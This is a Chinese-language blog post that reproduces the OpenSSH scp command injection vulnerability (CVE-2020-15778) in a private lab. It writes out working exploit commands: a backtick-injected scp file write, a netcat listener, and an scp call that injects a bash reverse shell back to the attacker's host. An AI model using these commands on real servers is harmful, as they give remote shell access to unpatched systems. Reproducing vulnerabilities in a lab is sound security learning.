zoukankan      html  css  js  c++  java
  • OpenSSH 命令注入漏洞(CVE202015778)

    最近看好多大佬都在复现这个OpenSSH命令注入漏洞,作为菜鸡的我也要跟随大佬的脚步,也来复现一波(不分析漏洞原理,本人是菜鸡,能力不足)。再写这篇博客很不幸的我(电脑蹦了重启,写好的都没保存),不放弃继续重新来一遍。

    介绍

    2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。

    漏洞影响版本

    OpenSSH =< 8.3p1

    漏洞复现要求

    OpenSSH =< 8.3p1

    需要知道ssh密码

    搭建环境

    centOS 7    IP:192.168.110.153

    kali2019.4  IP:192.168.110.134

    介绍一下scp命令:

    下面开始行动:

    关闭防火墙,(我没有关闭,在这里我也就不关闭了。)

    查看ssh版本吧

    ssh -V
    

    首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件。

    scp 1.txt root@192.168.110.153:'`touch /tmp/test.txt` /tmp'

     

    成功将kali上面的文件传入道centOS上面,和自己创建了文件。

    直接进行nc反弹获取shell

    先监听一个端口

    nc -lvvp 7777

    进行反弹shell

    scp test.txt root@192.168.110.153:'`bash -i >& /dev/tcp/192.168.110.134/7777 0>&1`/tmp/test1.txt'

     

    总结:该漏洞复现简单,漏洞等级 严重。复现需要知道ssh密码,主要针对知道ssh密码却不给登录,这样就可进行反弹shell获取权限了。

    改正: 

    我在总结说知道ssh密码却不给登录,这个我今天复现尝试了,禁止远程登录这个命令是不行的,应该是需要做别的策略,还在继续探索中,主要修改一下自己错误的地方。

    参考文章:OpenSSH 命令注入漏洞通告(CVE-2020-15778)

  • 相关阅读:
    javascript数组对象
    jquery、javascript实现(get、post两种方式)跨域解决方法
    js检查字符串的包含关系
    element——message消息提示
    js把mysql传过来的时间格式化为:0000-00-00 00:00:00
    beego orm操蛋问题:操作都需要主键
    element——message-box
    VUE.js全局变量的定义
    element el-upload组件获取文件名
    go遍历某个文件夹
  • 原文地址:https://www.cnblogs.com/hcrk/p/13495626.html
Copyright © 2011-2022 走看看